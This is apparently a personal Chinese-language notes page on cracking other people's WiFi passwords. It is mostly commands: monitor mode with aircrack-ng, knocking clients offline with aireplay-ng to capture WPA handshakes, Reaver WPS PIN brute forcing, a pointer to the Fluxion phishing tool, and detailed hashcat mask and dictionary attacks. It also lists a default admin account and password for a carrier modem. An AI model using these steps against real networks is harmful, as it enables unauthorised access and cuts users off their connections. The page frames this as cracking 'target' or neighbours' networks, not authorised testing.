破解wifi密码

https://www.cnblogs.com/pshell/p/8339818.html
适用于WIFI Hacking的无线网卡推荐

    Atheros AR9271
    Ralink RT3070
    Ralink RT3572
    Realtek 8187L (Wireless G adapters)
    Realtek RTL8812AU (2017年新增)
    经过我的测试Ralink RT5370N也是兼容的


选择特殊USB网卡， 8187L ,RT3070 . 有监听功能，，蹭网器常用 8187L芯片和3070芯片两种核心.


--------------------------------------------------

启动Linux mint 。打开终端窗口。并执行以下步骤。



sudo apt install  aircrack-ng      ######


步骤1：ifconfig（接口配置）：查看或更改系统上网络接口的配置。

ifconfig -a                       iwconfig  ######          

iw list   ######
如果列出的模式有monitor，则表示支持监听。否则，不支持。

wlan0：系统上的第一个无线网络接口。（这就是我们需要的。）



步骤2：停止当前使用WiFi接口的进程。

sudo airmon-ng check kill   ###########

步骤3：在监控模式下启动wlan0 。

sudo airmon-ng start wlx000d18302a4a   ########### 
sudo airmon-ng start wlan0


 rfkill list   ####

          0: phy0: Wireless LAN
                   Soft blocked: no
                   Hard blocked: no   *****

 rfkill unblock 0

正常情况下，网卡为manage模式，有两种方式开启monitor模式

利用iw开启monitor模式：iw dev wlan0 interface add wlan0mon type monitor

恢复WiFi:
     sudo service network-manager start  
===========================================
从无线模块的显示列表可以看出，序号2的wifi模块是软硬件是可以启动的，所以，只要将前面默认的模块移出即可；使用命令：

sudo modprobe -r ideapad_laptop    
即移出了ideapad的无线模块，再reboot,WIFI模块工作正常 rfkill list     Hard blocked: no



================================================
步骤4：查看您周围的所有Wifi网络。

sudo airodump-ng wlan0mon   ###########

    airodump-ng：用于数据包捕获wlan0mon：接口名称（此名称在不同设备上可以不同）

找到目标网络后，按Ctrl + C可以停止该过程。

步骤5：查看连接到目标网络的客户端。

sudo airodump-ng -c 6 --bssid 80:EA -w  TP-LINK_xxxx wlan0mon     ######


sudo airodump-ng -c 11 --bssid A8:57 -w  CMCC-xxxx wlan0mon 

-c : wifi频道
-w : 保存名字
---------------------------------------------------------------------




步骤6：打开一个新的终端窗口以断开连接到目标网络的客户端。

sudo aireplay-ng -0 10 -a  80:EA wlan0mon     

sudo aireplay-ng -0 10 -a A8:57 -c 20:EE wlan0mon        ########

ireplay-ng：注入帧-0：用于取消认证10：发送的去认证报文数
-a：对于目标网络的bssid
-c: 目标手机
-0 10: 攻击10次
wlan0mon：接口名称。

客户端与目标网络断开连接时。他尝试重新连接到网络，当他这样做时，您将在终端的上一个窗口中得到称为WPA握手的信息。

现在，我们完成了捕获数据包的工作。因此，现在您可以关闭终端窗口。


步骤7.解密密码。打开文件应用程序。
/home/hacking-01.cap       ########

    hacking-01.cap是您需要的文件。
aircrack-ng -a2 -b 80：35 -w /root/passwords.txt /root/hacking-01.cap

aircrack-ng：802.11WEP和WPA-PSK密钥破解程序-a：用于WPA2的-a2和-用于WPA网络的-a-b：目标网络的BSSID-w：单词表文件的位置/root/hacking-01.cap：cap文件的位置

您可以从互联网上下载常用密码文件，如果要创建自己的文件，则可以使用紧缩工具


===================================================================

Reaver 

https://github.com/t6x/reaver-wps-fork-t6x
Reaver has been designed to be a robust and practical attack against Wi-Fi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases
and has been tested against a wide variety of access points and WPS implementations.
Depending on the target's Access Point (AP), to recover the plain text WPA/WPA2 passphrase the average amount of time for the transitional online brute 
force method is between 4-10 hours. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase. 
When using the offline attack, if the AP is vulnerable, it may take only a matter of seconds to minutes.


sudo apt -y install build-essential libpcap-dev aircrack-ng pixiewps

Setup

Download
git clone https://github.com/t6x/reaver-wps-fork-t6x
or
wget https://github.com/t6x/reaver-wps-fork-t6x/archive/master.zip && unzip master.zip

Locate the shell
cd reaver-wps-fork-t6x*
cd src

Compile
./configure
make

Install
sudo make install

----------------------------------

Wash
当攻击者在对WPS PIN码进行暴力破解攻击时，很多接入点会将自己锁定以保证路由器的安全性。而Wash就是一款能够确定目标接入点是否开启了WPS的工具，
在使用Reaver进行了多次尝试之后，你可以用Wash来检查接入点是否锁定了WPS。
sudo wash -i wlan0mon 扫描周围网络是否禁用wps

sudo wash -i wlan0mon    #########


已淘汰 reaver
sudo reaver -i wlan0mon -b A8:57 -a -c 11 -e CMCC-XX -l 60 -S -vv

sudo reaver -i wlan0mon -b E4:47 -c 8 -M -S -K -vv 


    -i，开启了监听模式的网络接口名
    -b，要探测的Wifi的BSSID
    -c，成功破解之后运行的命令
    -5，使用5G信道
    -v，显示具体信息，-vv或者-vvv可以显示更加详细的信息
    -q，仅显示关键信息
    -p，要使用的PIN
    -d，尝试PIN之间的间隔时间（默认1）
    -l，如果路由器锁定尝试PIN，等待的时间（默认60）
    -g，最大尝试次数，到达次数之后命令会停止
    -x，10次意外失败之后的等待时间（默认0）
    -t，接收超时周期（默认10）
    -F，忽略帧校验错误

sudo reaver -i wlan0mon -b BC:D1  -vv






Wifite是一款能够攻击多种无线加密方式（WEP/WPA/WPA2和WPS）的自动化工具， Wifite在运行之前需要提供几个参数，而Wifite将会自动帮我们完成所有的任务。
它可以捕获WPA握手包，自动化去客户端验证，进行MAC地址欺骗，以及破解WiFi密码。


------------------------------------------------------------------------------------------------------


https://github.com/ChunshengZhao/inflator
Inflator is a Reaver Command Generator, create by Fast Light User-Interface Designer ("FLUID").

Build steps:
sudo apt-get install fluid
sudo fluid -c inflator.fl
sudo fltk-config --compile inflator.cxx
sudo ./inflator



-----------------------------------------------------

https://segmentfault.com/a/1190000021829795
Kali从入门到银手镯（二）：开启WPS的无线网络渗透测试


https://zhuanlan.zhihu.com/p/476928522
无线渗透(中)--WPS破解
(1)airodump wlan0mon --wps 开启WPS的设备会显示如下
(2)wash -i wlan0mon 采用wash命令只会显示开启WPS的设备，但是会显示设备是否已经被锁上，因为有时爆破PIN码时会导致路由器被锁住


-----------------------------------------------------


fluxion就是利用了钓鱼的方法来伪造登录界面进行入侵。
https://github.com/FluxionNetwork/fluxion




为什么说这个方法推荐使用呢？因为他只作用于当前终端中，不会影响环境，而且命令比较简单

在终端中直接运行：
如果是https那么就经过如下命令：

export https_proxy=http://127.0.0.1:8580

移动吉比特GM619光猫
账号:CMCCAdmin密码:aDm8H%MdA



--------------------------------------------------

https://www.bilibili.com/read/cv9131435   ############
三分钟，快速入狱教程，之如何迅速破解WiFi密码 
hashcat是一款很强大的密码破解工具，不仅可以破解WiFi密码，还可以破解电脑系统、压缩包、文档等密码，破解方式除字典破解以外，也有很多种。

首先将抓取到的WiFi握手包.cap文件转成hashcat能够破解的.haccpx文件，输入aircrack-ng 抓取握手包的名字.cap -j 保存的哈希破解包名字，会在当前目录得到一个.haccpx文件

输入hashcat -m 2500 -a 0 保存的哈希名字.hccapx 字典名字.txt，即可极速破解！（每秒可达10万个）





https://cdn.modb.pro/db/122207
如何高速猜出破解wifi密码？hashcat运用（超详细）
将cap转换为hashcat能够破解的形式



Hashcat 的使用
https://www.jianshu.com/p/52d1ed684020   ############

使用 aircrack-ng 将握手包转换成 hccapx 格式
aircrack-ng 1.cap -j 1
hashcat -a 3 -m 2500 1.hccapx ?d?d?d?d?d?d?d?d --force

或者使用 hashcat 官网提供的在线工具进行格式转换：https://hashcat.net/cap2hashcat/
hashcat -a 3 -m 22000 1.hc22000 ?d?d?d?d?d?d?d?d --force                ############                   




https://zhuanlan.zhihu.com/p/633207702      ############
2023-05-29 如何使用 hashcat 破解 RAR、ZIP 压缩包密码

用Hashcat每秒计算1.4亿个密码，破解隔壁WIFI密码
https://www.cnblogs.com/diligenceday/p/6359661.html     ############

-D 1 //1默认cpu，2为gpu…
hashcat64.exe -m 2500 -D 1 1Anomymous.hccapx rockyou.txt


hashcat -m 2500 -a 3 handshake.hccap ?d?d?d?d?d?d?d?d

　　?d?d?d?d?d?d?d?d代表8为数字

下面的意思:用GPU且8位数字掩码来破解34-96-72-0A-0C-DA_handshake.cap.hccap包


hashcat64.exe -a 3 -m 2500 G:\wifi\pcap\ziroom301\34-96-72-0A-0C-DA_handshake.cap.hccap ?d?d?d?d?d?d?d?d


下面的意思:用GPU且9位大小写字母特殊字符组合的掩码来破解34-96-72-0A-0C-DA_handshake.cap.hccap包


hashcat64.exe -a 3 -m 2500 G:\wifi\pcap\ziroom301\34-96-72-0A-0C-DA_handshake.cap.hccap --custom-charset1=?a ?1?1?1?1?1?1?1?1?1



-r  使用自定义破解规则
-o  指定破解成功后的 hash 及所对应的明文密码的存放位置
-m  指定要破解的 hash 类型，如果不指定类型，则默认是 MD5
-a  指定要使用的破解模式，其值参考后面对参数。“-a 0” 字典攻击，“-a 1” 组合攻击；“-a 3” 掩码攻击
-D  指定 opencl 的设备类型
--show      显示已经破解的 hash 及该 hash 所对应的明文
--force     忽略破解过程中的警告信息,跑单条 hash 可能需要加上此选项
--remove    删除已被破解成功的 hash
--username      忽略 hash 文件中的指定的用户名,在破解 linux 系统用户密码 hash 可能会用到
--increment     启用增量破解模式,你可以利用此模式让 hashcat 在指定的密码长度范围内执行破解过程
--increment-min         密码最小长度,后面直接等于一个整数即可,配置 increment 模式一起使用
--increment-max         密码最大长度,同上
--outfile-format        指定破解结果的输出格式 id ,默认是 3
--self-test-disable 关闭启动自检


0 | Straight    （字段破解）
1 | Combination （组合破解）
3 | Brute-force （掩码暴力破解）
6 | Hybrid Wordlist + Mask（字典+掩码破解）
7 | Hybrid Mask + Wordlist（掩码+字典破解）


1 | CPU
2 | GPU
3 | FPGA, DSP, Co-Processor

l | abcdefghijklmnopqrstuvwxyz              纯小写字母
u | ABCDEFGHIJKLMNOPQRSTUVWXYZ              纯大写字母
d | 0123456789                              纯数字
h | 0123456789abcdef                        十六进制小写字母和数字
H | 0123456789ABCDEF                        十六进制大写字母和数字
s |  !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~       特殊字符
a | ?l?u?d?s                                键盘上所有可见的字符
b | 0x00 - 0xff                             匹配密码空格




hashcat --version

使用 hashcat 官网提供的在线工具进行格式转换：https://hashcat.net/cap2hashcat/
将握手包转换成 hc22000 格式

hashcat -a 3 -m 22000 XXX.hc22000 ?d?d?d?d?d?d?d?d --force


hashcat -a 3 -m 22000 C:\tools\temp\bxxx01.hc22000 ?d?d?d?d?d?d?d?d?d?d?d --force

显示破解完成的密码
hashcat  -m 22000 11.hccapx  pass.txt --force --show

--show      将hashlist与potfile比较; 显示破解的哈希    
--left      将hashlist与potfile比较; 显示未破裂的哈希  




---------------------------------------------------------

https://blog.csdn.net/weixin_43798572/article/details/122554100
Python pywifi 、Kali linux aircrack-n、Hashcat 【python、kali】破解无线WiFi密码（详细流程）

https://zhuanlan.zhihu.com/p/53268033
周叔讲信息安全-2、wifi网络安全原理及防范       ############

目前，最为简约和可靠的方式是用cdlinux抓取数据包，然后把握手包拿到windows下用显卡跑包。

第一种方法：EWSA跑握手包。
EWSA破解的难点其实不在具体的破解业务上，难点在EWSA程序本身，因为这个程序是个商业软件，是要付费购买的，而且价格不菲，大多数人都是想到去找破解版，而现在网上的破解版基本都是不能用的，要么就是报错和系统不兼容，要么就是不显示显卡。
第二种方法：用wifipr软件跑包。
这也是一个付费软件，和EWSA差不多，都是使用显卡来跑包，操作上也是和EWSA非常相近，但是这个软件相比EWSA有一个非常大的优点。就是这个软件的破解版在网上非常容易找到，而且兼容性要比EWSA的破解版好的多，所以第二种方法中我们推荐使用这个软件。
第三种方法：hashcat跑包。
Hashcat也是这样，这个软件只提供命令行版本的程序，kali系统自带个软件，可以直接在shell中使用，其它的系统要去官方网站下载这个软件再使用。
对于软件的安装非常简单，在windows下只需要打开下载的软件包，直接用命令行运行即可，不需要安装步骤。
所以新版的hashcat中要求提供的包格式为了hccapx。故在使用hashcat跑包之前我们需要用工具将cap的握手包转换为hccapx的包。
将抓到的.cap格式的握手包上传hashcat官网提供的在线格式转换工具  https://hashcat.net/cap2hashcat/


关于PIN破解，这里有一个限制，就是一些老的路由器才会存在这个漏洞，现在市场的路由器基本上已经做了防PIN设置，PIN破解对于这些路由器无效。
对于PIN破解的实操方法最简单的就是用CDlinux的小水滴破解程序minidwep-gtk，它在扫描到无线AP后会首先启用PIN破解。



https://zhuanlan.zhihu.com/p/24803690
Reaver基本命令参数详解及应用
reaver –i mon0 –b MAC –a –S –vv –d 3 –t 3 //开始穷举PIN码
-------------------------------------------------------------------------------









